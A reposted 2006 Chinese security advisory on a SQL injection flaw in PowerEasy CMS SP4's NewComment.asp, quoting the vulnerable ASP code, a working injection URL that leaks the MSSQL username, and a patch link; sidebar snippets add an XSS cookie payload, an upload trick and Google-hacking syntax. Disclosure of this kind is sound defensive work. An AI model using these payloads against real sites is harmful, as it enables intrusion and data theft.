动易SP4的漏洞利用

最新推荐文章于 2025-06-17 14:06:58 发布
最新推荐文章于 2025-06-17 14:06:58 发布
阅读量350 收藏
点赞数
文章标签: sql join access user c
<script language='javascript' src='http://www.taizhou.la/AD/ad.js'></script>

发布日期:2006-10-21
漏洞发现:Bug.Center.Team

在NewComment.asp文件中

ModuleName = Trim(request("ModuleName"))

这个ModuleName变量没过滤好,从而导致,我们可以在下面的SQL语句中构造我们的
SQL语句

If ModuleName <> "" Then
If ChannelID <> 0 Then
If ClassID <> 0 Then
sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & ModuleName & " A on C.InfoID=A." & ModuleName & "ID where A.ChannelID= " & ChannelID & " and A.ClassID= " & ClassID & " and C.Passed =" & PE_True

sqlComment = "Select top " & Num & " C.* from PE_Comment C left join PE_" & Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1+and+1=1

在A.ChannelID=1后就可以构造我们的SQL语句。(其中空格用+来代替。)

NewComment.asp?num=1&ChannelID=1&ClassID=1&ModuleName=Article+A+on+C.InfoID=A.ArticleID+where+A.ChannelID=1%20and%20user>0--

例如这样就可以暴mssql用户名

省下的就是sql注入老

补丁下载: http://bbs.powereasy.net/dispbbs.asp?boardID=67&ID=280136&page=1

影响版本: 所有版本(包括免费版、商业SQL版及Access版)

<script language='javascript' src='http://www.taizhou.la/AD/as.js'></script>
aspnetkkk123
关注
Google / Baidu 黑客搜索引擎语法详细记录
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
09-08 2568
下面就来介绍一些常用的语法: intext: 这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:网.将返回所有在网页正文部分包含”网”的网页.allintext:使用方法和intext类似. intitle: 和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:安全天使.将返回所有网页标题中包含”安全天使”的网页.同理allintitle:也同intitle类似. cache: 搜索
网站管理系统vote.asp页面存在SQL注入漏洞
jahn的专栏
10-31 7769
---------------------------------------------http://www.neeao.comNeeaos Security BlogBCT授权本站独家转载,转载请保留此签名。---------------------------------------------Infos: 漏洞预警中心小组应急事件响应公告(BCTCERA0701)Author: admi
html在线编辑器 漏洞,网站管理系统vote.asp页面存在SQL注入漏洞
weixin_39553904的博客
05-30 1133
网站管理系统vote.asp页面存在SQL注入漏洞测试系统:(PowerEasy CMS SP6 071030以下版本)安全综述:网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。漏洞描述:vote.asp调用了组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入但是其语句里面过滤...
最新利用方法,通杀
INFO TECH
04-29 1403
因为单位网站被人挂马,哈哈,不让我管,那就不关我事了,气死~讨厌自以为是的人。上网了解了下,居然看到这个消息,记下来啦,很有用的啦大致方法:1.注册一个das.asp的用户名(会被系统自建立一个以用户名为名字的目录)2.传图片马(主要是利用了03对.asp目录的支持,03下的.asp目录的特性引起的 。官方也存在这个漏洞)3.注册.asp然后回主站 user/Upload.asp?dia
2006_SP6最新漏洞得到管理员密码(转)
rjgcwl的专栏
01-15 3729
2006_SP6最新漏洞得到管理员密码(转) 雕牌注:其实这个消息跨站很早我就测试过了,也成功,只是比较特须没能利用成功,此文还不错,转来学习学习。鬼仔注:从7j那里看到的,并且有7j写的接收页面。7j:没有找到他说的接收页面,只有自已用PHP写个了$filename = date("Ymd").
CMS漏洞收集
08-01 1981
SiteWeaver6.8短消息0day跨站漏洞 user用户登陆,默认账号密码 admin/admin888 短消息代码模式下编辑,预览 <imgsrc="../Skin/blue/powerease_logo.gif"onload="resizepic(this);functionresizepic(){alert(document.cookie)};"&...
漏洞
热门推荐
asp经验积累
02-16 1万+
漏洞网站管理系统是当前中国最具性价比、最受欢迎的CMS系统和电子商务系统,目前已有超过10万个以上网站的应用规模,拥有政府、企业、科研教育和媒体等各个行业领域的几千名商业用户。其中的Region.asp的Province = Trim(Request.QueryString("Province"))语句没经过过滤的,我们可以利用构造我们的SQL语句,进行注入。总是用工具注入,水平也不会提高
的服务器安全配置[参考].pdf
10-12
在安装操作系统后,需要及时更新到最新版本的服务包,例如Windows 2000需要安装SP4,Windows 2003需要安装SP1。此外,通过Windows Update获取并安装所有关键安全更新,以确保系统安全。 安装杀毒软件也是必不可少的...
的服务器安全配置宣贯.pdf
11-13
首先,安装操作系统补丁是第一步,例如,对于Windows 2000操作系统,应当安装SP4服务包,而对于Windows 2003,则应安装SP1。接着,通过运行"开始→Windows Update"来获取并安装所有关键的安全更新,这有助于防止潜在...
PowerEasy_CMS2006_SP3
12-09
- **安全增强**:修复了前一版本的已知安全漏洞,增强了系统的防护能力,降低了被黑客攻击的风险。 - **用户体验提升**:对用户界面进行了一些改进,使得操作更加直观,提升了用户的使用体验。 - **新功能引入**:...
网8.2版本的注入漏洞利用
WQ_762的博客
08-07 1110
【实验原理】 网8.2在用户登录时,过滤不严,可以导致注入,提升权限。漏洞存在源程序的login.asp文件。 【实验步骤】 一、正常注册登录 1.1访问地址:http://192.168.1.3:8010/。 1.2 首先我们注册一个用户:san,密码:123456。 二、漏洞测试与利用 2.1 然后退出san用户,打开登录页面。 2.2使用以下语句登录:san’ ...
html编辑器漏洞,网站管理系统删除任意文件漏洞
weixin_42522626的博客
06-25 795
这个漏洞对于网站管理系统来说,就是致命的了。此漏洞存在于User目录下的User_saveflash.asp文件中,其第6~22行代码如下所示。Dim act, ObjInstalled_FSO, color_name, Create_1, imgurl, SaveFileName, dirMonthobjName_FSO = Application("objName_FSO")ObjInst...
SQL力扣
zhuiQiuMX的博客
06-13 474
今天的题好多case then else end的。
12.select语句单表查询
码明的博客
06-17 1624
摘要:本文详细介绍了SQL单表查询的基本语法与应用场景。主要内容包括:1)SELECT语句的基本用法(DISTINCT去重、字段选择);2)WHERE子句的条件查询(比较运算符、逻辑运算符);3)重点解析模糊查询(LIKE/ILIKE操作符,%和_通配符的使用技巧及性能优化建议);4)ORDER BY排序功能;5)通过学生成绩表示例演示15种典型查询场景,包括总分统计、条件筛选、模糊匹配和排序等。特别强调DISTINCT去重的注意事项和模糊查询的索引优化策略。
PostgreSQL的扩展pg_visibility
文牧之的博客
06-14 989
检查可见性映射:查看哪些数据块被标记为"全部可见"诊断页面问题:识别可能包含死元组(dead tuples)的页面维护辅助:帮助优化VACUUM操作。
python2.7+flask1.1.4+SQLAlchemy1.3.0+Flask-SQLAlchemy2.1连接mysql稳定方式
最新发布
python程序员
06-17 153
经过了多次尝试,该版本是python2.7比较稳定好用的版本。
Postgresql日常维护
2501_91557222的博客
06-13 1336
实际上,你可以指定恢复到任何已有数据库名,但是如果你正在将转储载入到一个空集簇中则通常要用(postgres)。在恢复一个pg_dumpall转储时常常需要具有数据库超级用户访问权限,因为它需要恢复角色和表空间信息。如果你在使用表空间,请确保转储中的表空间路径适合于新的安装。pg_dumpall工作时会发出命令重新创建角色、表空间和空数据库,接着为每一个数据库pg_dump。这意味着每个数据库自身是一致的,但是不同数据库的快照并不同步。
JDBC强化关键_004_SQL 注入与批处理
lu_shao_feng的博客
06-16 901
JDBC 强化关键内容之 SQL 注入与批处理解读。
SQL Server判断中文的高效方法
qq_40603125的博客
06-13 181
和 Unicode 范围来判断字段是否包含中文字符。在 SQL Server 中,可以使用。
2006sp3网站管理系统纯净版功能与下载指南
4. **PE2006_DLL.exe**:安装2006SP3可能需要依赖某些DLL文件,该安装程序负责安装这些必要的组件。 5. **ReadMe.html**:通常包含了最新版本的简短介绍和重要变更说明,是安装后的第一步阅读文件。 6. **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值